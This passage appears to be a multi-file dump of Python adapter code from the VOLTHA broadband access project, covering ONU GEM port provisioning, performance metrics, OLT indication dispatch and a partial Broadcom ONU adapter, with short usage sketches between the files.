from voltha.adapters.adtran_olt.xpon.gem_port import GemPort
from twisted.internet.defer import inlineCallbacks, returnValue, succeed
from omci.omci_me import GemPortNetworkCtpFrame
class OnuGemPort(GemPort):
"""
Adtran ONU specific implementation
"""
def __init__(self, gem_id, alloc_id,
encryption=False,
omci_transport=False,
multicast=False,
tcont_ref=None,
traffic_class=None,
intf_ref=None,
exception=False, # FIXED_ONU
name=None,
handler=None,
is_mock=False):
super(OnuGemPort, self).__init__(gem_id, alloc_id,
encryption=encryption,
omci_transport=omci_transport,
multicast=multicast,
tcont_ref=tcont_ref,
traffic_class=traffic_class,
intf_ref=intf_ref,
exception=exception,
name=name,
handler=handler)
self._is_mock = is_mock
self.log = structlog.get_logger(device_id=handler.device_id, gem_id=gem_id)
@property
def encryption(self):
return self._encryption
@encryption.setter
def encryption(self, value):
assert isinstance(value, bool), 'encryption is a boolean'
if self._encryption != value:
self._encryption = value
omci = None # TODO: Get from handler
@staticmethod
def create(handler, gem_port, is_mock=False):
return OnuGemPort(gem_port['gemport-id'],
None,
encryption=gem_port['encryption'], # aes_indicator,
tcont_ref=gem_port['tcont-ref'],
name=gem_port['name'],
traffic_class=gem_port['traffic-class'],
handler=handler,
is_mock=is_mock)
@inlineCallbacks
def add_to_hardware(self, omci):
if self._is_mock:
returnValue('mock')
omci = self._handler.omci
tcont = self.tcont
assert omci is not None, 'No OMCI engine'
assert tcont is not None, 'No TCONT'
assert tcont.entity_id == 0x8001, 'Hardcoded Entity ID NOT FOUND'
try:
direction = "downstream" if self.multicast else "bi-directional"
assert not self.multicast, 'MCAST is not supported yet'
# TODO: For TCONT ID, get the TCONT's entity ID that you programmed
# TODO: For TM, is this the entity ID for a traffic descriptor?
# results = yield omci.send_create_gem_port_network_ctp(self.gem_id, # Entity ID
# self.gem_id, # Port ID
# tcont.entity_id, # TCONT ID
# direction, # Direction
# 0x100) # TM
results = None
# results = yield omci.send(GemPortNetworkCtpFrame(self.gem_id, # Entity ID
# self.gem_id, # Port ID
# tcont.entity_id, # TCONT ID
# direction, # Direction
# 0x100).create() # TM
except Exception as e:
self.log.exception('gemport-create', e=e)
raise
try:
# GEM Interworking config
# TODO: For service mapper ID, always hardcoded or does it come from somewhere else
# It is probably the TCONT entity ID
results = None
# results = yield omci.send_create_gem_inteworking_tp(self.gem_id, # Entity ID
# self.gem_id, # GEMPort NET CTP ID
# tcont.entity_id) # Service Mapper Profile ID
except Exception as e:
self.log.exception('interworking-create', e=e)
raise
try:
# Mapper Service Profile config
# TODO: All p-bits currently go to the one and only GEMPORT ID for now
# TODO: The entity ID is probably the TCONT entity ID
results = None
# results = omci.send_set_8021p_mapper_service_profile(tcont.entity_id, # Entity ID
# self.gem_id) # Interworking TP ID
except Exception as e:
self.log.exception('mapper-set', e=e)
raise
returnValue(results)
@inlineCallbacks
def remove_from_hardware(self, omci):
if self._is_mock:
returnValue('mock')
omci = self._handler.omci
assert omci is not None, 'No OMCI engine'
results = succeed('TODO: Implement me')
# uri = AdtranOltHandler.GPON_GEM_CONFIG_URI.format(pon_id, onu_id, self.gem_id)
# name = 'gem-port-delete-{}-{}: {}'.format(pon_id, onu_id, self.gem_id)
# return session.request('DELETE', uri, name=name)
returnValue(results)
def set_config(self, omci, value, leaf):
if self._is_mock:
return
# from ..adtran_olt_handler import AdtranOltHandler
#
# data = json.dumps({leaf: value})
# uri = AdtranOltHandler.GPON_GEM_CONFIG_URI.format(self.pon_id,
# self.onu_id,
# self.gem_id)
# name = 'onu-set-config-{}-{}-{}'.format(self._pon_id, leaf, str(value))
# return session.request('PATCH', uri, data=data, name=name)
pass # TODO: Implement me
```
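A minimal sketch of how the handler's xPON code might build one of these from gemport config data; the field values and the `handler` object are illustrative, and `is_mock=True` keeps the OMCI exchange a no-op:
```python
def provision_gem_port(handler):
    # 'handler' is the ONU device handler (placeholder); values are illustrative only.
    gem_data = {
        'gemport-id': 2176,
        'encryption': False,
        'tcont-ref': 'tcont-1',
        'name': 'gemport-2176',
        'traffic-class': 0,
    }
    gem_port = OnuGemPort.create(handler, gem_data, is_mock=True)
    return gem_port.add_to_hardware(handler.omci)   # Deferred; fires with 'mock' here
```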
#### File: adapters/adtran_onu/onu_pm_metrics.py
```python
from voltha.protos.device_pb2 import PmConfig, PmConfigs, PmGroupConfig
from ..adtran_olt.pki.adapter_pm_metrics import AdapterPmMetrics
class OnuPmMetrics(AdapterPmMetrics):
def __init__(self, handler, device, grouped=False, freq_override=False):
super(OnuPmMetrics, self).__init__(handler, device,
grouped=grouped, freq_override=freq_override)
# PM Config Types are COUNTER, GUAGE, and STATE # Note: GAUGE is misspelled in device.proto
self.omci_pm_names = {
('enabled', PmConfig.STATE),
('tx_frames', PmConfig.COUNTER),
('tx_errors', PmConfig.COUNTER),
('rx_frames', PmConfig.COUNTER),
('rx_unknown_tid', PmConfig.COUNTER),
            ('rx_onu_frames', PmConfig.COUNTER),        # Rx ONU autonomous messages
('rx_alarm_overflow', PmConfig.COUNTER), # Autonomous ONU generated alarm message overflows
('rx_avc_overflow', PmConfig.COUNTER), # Autonomous ONU generated AVC message overflows
('rx_onu_discards', PmConfig.COUNTER), # Autonomous ONU message unknown type discards
('rx_timeouts', PmConfig.COUNTER),
('consecutive_errors', PmConfig.COUNTER),
('reply_min', PmConfig.GUAGE), # Milliseconds
('reply_max', PmConfig.GUAGE), # Milliseconds
('reply_average', PmConfig.GUAGE), # Milliseconds
}
self.health_pm_names = {
('enabled', PmConfig.STATE),
('alarm_active', PmConfig.STATE),
('heartbeat_count', PmConfig.COUNTER),
('heartbeat_miss', PmConfig.COUNTER),
('alarms_raised_count', PmConfig.COUNTER),
('heartbeat_failed_limit', PmConfig.COUNTER),
('heartbeat_interval', PmConfig.COUNTER),
}
# TODO Add PON Port PM
# TODO Add UNI Port PM
self.omci_metrics_config = {m: PmConfig(name=m, type=t, enabled=True)
for (m, t) in self.omci_pm_names}
self.health_metrics_config = {m: PmConfig(name=m, type=t, enabled=True)
for (m, t) in self.health_pm_names}
def update(self, pm_config):
# TODO: Test both 'group' and 'non-group' functionality
# TODO: Test frequency override capability for a particular group
if self.default_freq != pm_config.default_freq:
# Update the callback to the new frequency.
self.default_freq = pm_config.default_freq
self.lc.stop()
self.lc.start(interval=self.default_freq / 10)
if pm_config.grouped is True:
for m in pm_config.groups:
pass
# self.pm_group_metrics[m.group_name].config.enabled = m.enabled
# if m.enabled is True:,
# self.enable_pm_collection(m.group_name, remote)
# else:
# self.disable_pm_collection(m.group_name, remote)
else:
for m in pm_config.metrics:
self.omci_metrics_config[m.name].enabled = m.enabled
self.health_metrics_config[m.name].enabled = m.enabled
def make_proto(self):
pm_config = PmConfigs(id=self.id, default_freq=self.default_freq,
grouped=self.grouped,
freq_override=self.freq_override)
metrics = set()
if self.grouped:
pm_omci_stats = PmGroupConfig(group_name='OMCI',
group_freq=self.default_freq,
enabled=True)
pm_health_stats = PmGroupConfig(group_name='Heartbeat',
group_freq=self.default_freq,
enabled=True)
# TODO Add PON Port PM
# TODO Add UNI Port PM
else:
pm_omci_stats = pm_config
pm_health_stats = pm_config
# TODO Add PON Port PM
# TODO Add UNI Port PM
for m in sorted(self.omci_metrics_config):
pm = self.omci_metrics_config[m]
if not self.grouped:
if pm.name in metrics:
continue
metrics.add(pm.name)
pm_omci_stats.metrics.extend([PmConfig(name=pm.name,
type=pm.type,
enabled=pm.enabled)])
for m in sorted(self.health_metrics_config):
pm = self.health_metrics_config[m]
if not self.grouped:
if pm.name in metrics:
continue
metrics.add(pm.name)
pm_health_stats.metrics.extend([PmConfig(name=pm.name,
type=pm.type,
enabled=pm.enabled)])
return pm_config
def collect_port_metrics(self):
metrics = dict()
metrics['omci'] = self.collect_metrics(self.handler.omci,
self.omci_pm_names,
self.omci_metrics_config)
metrics['heartbeat'] = self.collect_metrics(self.handler.heartbeat,
self.health_pm_names,
self.health_metrics_config)
# TODO Add PON Port PM
# TODO Add UNI Port PM
return metrics
```
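A rough sketch of how a device handler might wire these metrics up (object names are placeholders; pushing `pm_config` to the core through the adapter agent is omitted since that API lives outside this file):
```python
def setup_onu_pm(handler, device):
    # 'handler' and 'device' are placeholders for the ONU handler and its Voltha Device.
    pm_metrics = OnuPmMetrics(handler, device, grouped=True, freq_override=False)
    pm_config = pm_metrics.make_proto()          # PmConfigs protobuf advertised northbound
    return pm_metrics, pm_config

# Later, on each collection interval:
#     stats = pm_metrics.collect_port_metrics()  # {'omci': {...}, 'heartbeat': {...}}
```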
#### File: adapters/asfvolt16_olt/asfvolt16_ind_handler.py
```python
from twisted.internet import reactor
from common.utils.grpc_utils import twisted_async
from voltha.adapters.asfvolt16_olt.protos import bal_indications_pb2
from voltha.adapters.asfvolt16_olt.protos import bal_model_types_pb2, \
bal_errno_pb2, bal_pb2, bal_model_ids_pb2
from voltha.adapters.asfvolt16_olt.grpc_server import GrpcServer
class Asfvolt16IndHandler(object):
def __init__(self, log):
self.log = log
def bal_acc_term_oper_sta_cng_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'access_terminal_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
bal_err = bal_pb2.BalErr()
return bal_err
def bal_acc_term_ind(self, indication, device_handler):
# ind_info: {'_object_type': <str>
# 'actv_status': <str>}
ind_info = dict()
ind_info['_object_type'] = 'access_terminal_indication'
ind_info['_sub_group_type'] = 'access_terminal_indication'
if ((indication.access_term_ind.data.admin_state == \
bal_model_types_pb2.BAL_STATE_UP) and \
(indication.access_term_ind.data.oper_status == \
bal_model_types_pb2.BAL_STATUS_UP)):
ind_info['activation_successful'] = True
else:
ind_info['activation_successful'] = False
reactor.callLater(0,
device_handler.handle_access_term_ind,
ind_info,
indication.access_term_ind.key.access_term_id)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_flow_oper_sts_cng(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'flow_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
ind_info['_object_type'] = indication.objType
ind_info['_sub_group_type'] = indication.sub_group
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_flow_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'flow_indication'
ind_info['_sub_group_type'] = 'flow_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_group_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'group_indication'
ind_info['_sub_group_type'] = 'group_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_oper_sts_cng(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'interface_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_los(self, indication, device_handler):
los_status = indication.interface_los.data.status
if los_status != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
balIfaceLos_dict = {}
balIfaceLos_dict["los_status"] = los_status.__str__()
reactor.callLater(0, \
device_handler.BalIfaceLosAlarm, \
indication.device_id, \
indication.interface_los.key.intf_id, \
los_status, balIfaceLos_dict)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_ind(self, indication, device_handler):
self.log.info('Awaiting-ONU-discovery')
reactor.callLater(0,\
device_handler.BalIfaceIndication,\
indication.device_id.decode('unicode-escape'),\
indication.interface_ind.key.intf_id)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_stat(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'interface_indication'
ind_info['_sub_group_type'] = 'stat_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_oper_sts_cng(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_discovery_ind(self, indication, device_handler):
# ind_info: {'object_type': <int>
# '_sub_group_type': <str>
# '_device_id': <str>
# '_pon_id' : <int>
# 'onu_id' : <int>
# '_vendor_id' : <str>
# '__vendor_specific' : <str>
# 'activation_successful':[True or False]}
onu_data = indication.terminal_disc
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'onu_discovery'
ind_info['_pon_id'] = onu_data.key.intf_id
ind_info['onu_id'] = onu_data.key.sub_term_id
ind_info['_vendor_id'] = onu_data.data.serial_number.vendor_id
ind_info['_vendor_specific'] = \
onu_data.data.serial_number.vendor_specific
reactor.callLater(0,
device_handler.handle_sub_term_ind,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_alarm_ind(self, indication, device_handler):
# Loss of signal
los = indication.terminal_alarm.data.alarm.los
        # Loss of burst
lob = indication.terminal_alarm.data.alarm.lob
# Loss of PLOAM miss channel
lopc_miss = indication.terminal_alarm.data.alarm.lopc_miss
# Loss of PLOAM channel
lopc_mic_error = indication.terminal_alarm.data.alarm.lopc_mic_error
balSubTermAlarm_Dict = {}
balSubTermAlarm_Dict["LOS Status"] = los.__str__()
balSubTermAlarm_Dict["LOB Status"] = lob.__str__()
balSubTermAlarm_Dict["LOPC MISS Status"] = lopc_miss.__str__()
balSubTermAlarm_Dict["LOPC MIC ERROR Status"] = lopc_mic_error.__str__()
if los != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLosAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
los, balSubTermAlarm_Dict)
if lob != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLobAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
lob, balSubTermAlarm_Dict)
if lopc_miss != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLopcMissAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
lopc_miss, balSubTermAlarm_Dict)
if lopc_mic_error != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLopcMicErrorAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
lopc_mic_error, balSubTermAlarm_Dict)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_dgi_ind(self, indication, device_handler):
# ind_info: {'_object_type': <str>
# '_device_id': <str>
# '_pon_id' : <int>
# 'onu_id' : <int>
# '_vendor_id' : <str>
# '__vendor_specific' : <str>
# 'activation_successful':[True or False]}
dgi_status = indication.terminal_dgi.data.dgi_status
if dgi_status != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'dgi_indication'
balSubTermDgi_Dict = {}
balSubTermDgi_Dict["dgi_status"] = dgi_status.__str__()
reactor.callLater(0,
device_handler.BalSubsTermDgiAlarm, \
indication.device_id, \
indication.terminal_dgi.key.intf_id,\
indication.terminal_dgi.key.sub_term_id, \
dgi_status,balSubTermDgi_Dict, ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_ind(self, indication, device_handler):
# ind_info: {'_object_type': <str>
# '_sub_group_type': <str>
# '_device_id': <str>
# '_pon_id' : <int>
# 'onu_id' : <int>
# '_vendor_id' : <str>
# '__vendor_specific' : <str>
# 'activation_successful':[True or False]}
onu_data = indication.terminal_ind
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'sub_term_indication'
ind_info['_pon_id'] = onu_data.key.intf_id
ind_info['onu_id'] = onu_data.key.sub_term_id
ind_info['_vendor_id'] = onu_data.data.serial_number.vendor_id
ind_info['_vendor_specific'] = \
onu_data.data.serial_number.vendor_specific
self.log.info('registration-id-in-bal-subs-term-ind-is',\
registration_id=onu_data.data.registration_id[:36])
ind_info['registration_id'] = onu_data.data.registration_id[:36]
ind_info['activation_successful'] = None
if (bal_model_types_pb2.BAL_STATE_DOWN == onu_data.data.admin_state or
bal_model_types_pb2.BAL_STATUS_UP != onu_data.data.oper_status):
ind_info['activation_successful'] = False
elif (bal_model_types_pb2.BAL_STATE_UP == onu_data.data.admin_state and
bal_model_types_pb2.BAL_STATUS_UP == onu_data.data.oper_status):
ind_info['activation_successful'] = True
reactor.callLater(0,
device_handler.handle_sub_term_ind,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_tm_queue_ind_info(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'tm_q_indication'
ind_info['_sub_group_type'] = 'tm_q_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_tm_sched_ind_info(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'tm_sched_indication'
ind_info['_sub_group_type'] = 'tm_sched_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_pkt_bearer_channel_rx_ind(self, indication, device_handler):
ind_info = dict()
ind_info['flow_id'] = indication.pktData.data.flow_id
ind_info['flow_type'] = indication.pktData.data.flow_type
ind_info['intf_id'] = indication.pktData.data.intf_id
ind_info['intf_type'] = indication.pktData.data.intf_type
ind_info['svc_port'] = indication.pktData.data.svc_port
ind_info['flow_cookie'] = indication.pktData.data.flow_cookie
ind_info['packet'] = indication.pktData.data.pkt
reactor.callLater(0,
device_handler.handle_packet_in,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_pkt_omci_channel_rx_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'packet_in_indication'
ind_info['_sub_group_type'] = 'omci_message'
packet_data = indication.balOmciResp.key.packet_send_dest
ind_info['onu_id'] = packet_data.itu_omci_channel.sub_term_id
ind_info['packet'] = indication.balOmciResp.data.pkt
self.log.info('ONU-Id-is',
onu_id=packet_data.itu_omci_channel.sub_term_id)
reactor.callLater(0,
device_handler.handle_omci_ind,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_pkt_ieee_oam_channel_rx_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'packet_in_indication'
ind_info['_sub_group_type'] = 'ieee_oam_message'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def handle_indication_from_bal(self, bal_ind, device_handler):
indication_handler = self.indication_handler_map.get((bal_ind.objType,
bal_ind.sub_group),
None)
if indication_handler is None:
self.log.debug('No handler', objType=bal_ind.objType,
sub_group=bal_ind.sub_group)
pass # no-op
else:
indication_handler(self, bal_ind, device_handler)
indication_handler_map = {
(bal_model_ids_pb2.BAL_OBJ_ID_ACCESS_TERMINAL,
bal_model_ids_pb2.BAL_ACCESS_TERMINAL_AUTO_ID_IND):
bal_acc_term_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_ACCESS_TERMINAL,
bal_model_ids_pb2.BAL_ACCESS_TERMINAL_AUTO_ID_OPER_STATUS_CHANGE):
bal_acc_term_oper_sta_cng_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_FLOW,
bal_model_ids_pb2.BAL_FLOW_AUTO_ID_OPER_STATUS_CHANGE):
bal_flow_oper_sts_cng,
(bal_model_ids_pb2.BAL_OBJ_ID_FLOW,
bal_model_ids_pb2.BAL_FLOW_AUTO_ID_IND):
bal_flow_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_GROUP,
bal_model_ids_pb2.BAL_GROUP_AUTO_ID_IND):
bal_group_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_INTERFACE,
bal_model_ids_pb2.BAL_INTERFACE_AUTO_ID_IND):
bal_iface_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_INTERFACE,
bal_model_ids_pb2.BAL_INTERFACE_AUTO_ID_LOS):
bal_iface_los,
(bal_model_ids_pb2.BAL_OBJ_ID_INTERFACE,
bal_model_ids_pb2.BAL_INTERFACE_AUTO_ID_OPER_STATUS_CHANGE):
bal_iface_oper_sts_cng,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_OPER_STATUS_CHANGE):
bal_subs_term_oper_sts_cng,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_SUB_TERM_DISC):
bal_subs_term_discovery_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_SUB_TERM_ALARM):
bal_subs_term_alarm_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_DGI):
bal_subs_term_dgi_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_IND):
bal_subs_term_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_TM_QUEUE,
bal_model_ids_pb2.BAL_TM_QUEUE_AUTO_ID_IND):
bal_tm_queue_ind_info,
(bal_model_ids_pb2.BAL_OBJ_ID_TM_SCHED,
bal_model_ids_pb2.BAL_TM_SCHED_AUTO_ID_IND):
bal_tm_sched_ind_info,
(bal_model_ids_pb2.BAL_OBJ_ID_PACKET,
bal_model_ids_pb2.BAL_PACKET_AUTO_ID_BEARER_CHANNEL_RX):
bal_pkt_bearer_channel_rx_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_PACKET,
bal_model_ids_pb2.BAL_PACKET_AUTO_ID_ITU_OMCI_CHANNEL_RX):
bal_pkt_omci_channel_rx_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_PACKET,
bal_model_ids_pb2.BAL_PACKET_AUTO_ID_IEEE_OAM_CHANNEL_RX):
bal_pkt_ieee_oam_channel_rx_ind,
}
```
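For orientation, a minimal dispatch sketch; the indication stream and device handler are placeholders for the gRPC plumbing that normally feeds this class:
```python
def process_indications(ind_handler, bal_indications, device_handler):
    # 'bal_indications' stands in for the iterable of bal_indications_pb2 messages read
    # from the gRPC stream; each one is routed by its (objType, sub_group) pair.
    for bal_ind in bal_indications:
        ind_handler.handle_indication_from_bal(bal_ind, device_handler)
```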
#### File: adapters/broadcom_onu/broadcom_onu.py
```python
from uuid import uuid4
import structlog
from twisted.internet import reactor, task
from twisted.internet.defer import DeferredQueue, inlineCallbacks, returnValue
from zope.interface import implementer
from voltha.adapters.interface import IAdapterInterface
from voltha.core.logical_device_agent import mac_str_to_tuple
import voltha.core.flow_decomposer as fd
from voltha.protos import third_party
from voltha.protos.adapter_pb2 import Adapter
from voltha.protos.adapter_pb2 import AdapterConfig
from voltha.protos.common_pb2 import LogLevel, OperStatus, ConnectStatus, \
AdminState
from voltha.protos.device_pb2 import DeviceType, DeviceTypes, Port, Image
from voltha.protos.health_pb2 import HealthStatus
from voltha.protos.logical_device_pb2 import LogicalPort
from voltha.protos.openflow_13_pb2 import OFPPS_LIVE, OFPPF_FIBER, OFPPF_1GB_FD, OFPPS_LINK_DOWN
from voltha.protos.openflow_13_pb2 import OFPXMC_OPENFLOW_BASIC, ofp_port
from voltha.protos.bbf_fiber_base_pb2 import VEnetConfig, VOntaniConfig
from voltha.protos.bbf_fiber_traffic_descriptor_profile_body_pb2 import \
TrafficDescriptorProfileData
from voltha.protos.bbf_fiber_tcont_body_pb2 import TcontsConfigData
from voltha.protos.bbf_fiber_gemport_body_pb2 import GemportsConfigData
from common.frameio.frameio import hexify
from voltha.extensions.omci.omci import *
_ = third_party
log = structlog.get_logger()
BRDCM_DEFAULT_VLAN = 4091
ADMIN_STATE_LOCK = 1
ADMIN_STATE_UNLOCK = 0
@implementer(IAdapterInterface)
class BroadcomOnuAdapter(object):
name = 'broadcom_onu'
supported_device_types = [
DeviceType(
id=name,
vendor_id='BRCM',
adapter=name,
accepts_bulk_flow_update=True
)
]
def __init__(self, adapter_agent, config):
self.adapter_agent = adapter_agent
self.config = config
self.descriptor = Adapter(
id=self.name,
vendor='Voltha project',
version='0.44',
config=AdapterConfig(log_level=LogLevel.INFO)
)
self.devices_handlers = dict() # device_id -> BroadcomOnuHandler()
# register for adapter messages
self.adapter_agent.register_for_inter_adapter_messages()
def start(self):
log.debug('starting')
log.info('started')
def stop(self):
log.debug('stopping')
log.info('stopped')
def adapter_descriptor(self):
return self.descriptor
def device_types(self):
return DeviceTypes(items=self.supported_device_types)
def health(self):
return HealthStatus(state=HealthStatus.HealthState.HEALTHY)
def change_master_state(self, master):
raise NotImplementedError()
def adopt_device(self, device):
log.info('adopt_device', device_id=device.id)
self.devices_handlers[device.id] = BroadcomOnuHandler(self, device.id)
reactor.callLater(0, self.devices_handlers[device.id].activate, device)
return device
def reconcile_device(self, device):
log.info('reconcile-device', device_id=device.id)
self.devices_handlers[device.id] = BroadcomOnuHandler(self, device.id)
reactor.callLater(0, self.devices_handlers[device.id].reconcile, device)
def abandon_device(self, device):
raise NotImplementedError()
def disable_device(self, device):
log.info('disable-onu-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.disable(device)
def reenable_device(self, device):
log.info('reenable-onu-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.reenable(device)
def reboot_device(self, device):
log.info('reboot-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.reboot()
def download_image(self, device, request):
raise NotImplementedError()
def get_image_download_status(self, device, request):
raise NotImplementedError()
def cancel_image_download(self, device, request):
raise NotImplementedError()
def activate_image_update(self, device, request):
raise NotImplementedError()
def revert_image_update(self, device, request):
raise NotImplementedError()
def self_test_device(self, device):
"""
        This is called to self-test a device based on an NBI call.
:param device: A Voltha.Device object.
:return: Will return result of self test
"""
log.info('self-test-device', device=device.id)
raise NotImplementedError()
def delete_device(self, device):
log.info('delete-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.delete(device)
del self.devices_handlers[device.id]
return
def get_device_details(self, device):
raise NotImplementedError()
def update_pm_config(self, device, pm_configs):
raise NotImplementedError()
def update_flows_bulk(self, device, flows, groups):
'''
log.info('bulk-flow-update', device_id=device.id,
flows=flows, groups=groups)
'''
assert len(groups.items) == 0
handler = self.devices_handlers[device.id]
return handler.update_flow_table(device, flows.items)
def update_flows_incrementally(self, device, flow_changes, group_changes):
raise NotImplementedError()
def send_proxied_message(self, proxy_address, msg):
log.info('send-proxied-message', proxy_address=proxy_address, msg=msg)
def receive_proxied_message(self, proxy_address, msg):
log.info('receive-proxied-message', proxy_address=proxy_address,
device_id=proxy_address.device_id, msg=hexify(msg))
# Device_id from the proxy_address is the olt device id. We need to
# get the onu device id using the port number in the proxy_address
device = self.adapter_agent. \
get_child_device_with_proxy_address(proxy_address)
if device:
handler = self.devices_handlers[device.id]
handler.receive_message(msg)
def receive_packet_out(self, logical_device_id, egress_port_no, msg):
log.info('packet-out', logical_device_id=logical_device_id,
egress_port_no=egress_port_no, msg_len=len(msg))
def receive_inter_adapter_message(self, msg):
log.info('receive_inter_adapter_message', msg=msg)
proxy_address = msg['proxy_address']
assert proxy_address is not None
# Device_id from the proxy_address is the olt device id. We need to
# get the onu device id using the port number in the proxy_address
device = self.adapter_agent. \
get_child_device_with_proxy_address(proxy_address)
if device:
handler = self.devices_handlers[device.id]
handler.event_messages.put(msg)
else:
log.error("device-not-found")
def create_interface(self, device, data):
log.info('create-interface', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_interface(data)
def update_interface(self, device, data):
log.info('update-interface', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.update_interface(data)
def remove_interface(self, device, data):
log.info('remove-interface', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.remove_interface(data)
def receive_onu_detect_state(self, device_id, state):
raise NotImplementedError()
def create_tcont(self, device, tcont_data, traffic_descriptor_data):
log.info('create-tcont', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_tcont(tcont_data, traffic_descriptor_data)
def update_tcont(self, device, tcont_data, traffic_descriptor_data):
raise NotImplementedError()
def remove_tcont(self, device, tcont_data, traffic_descriptor_data):
log.info('remove-tcont', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.remove_tcont(tcont_data, traffic_descriptor_data)
def create_gemport(self, device, data):
log.info('create-gemport', device_id=device.id)
if device.id in self.devices_handlers:
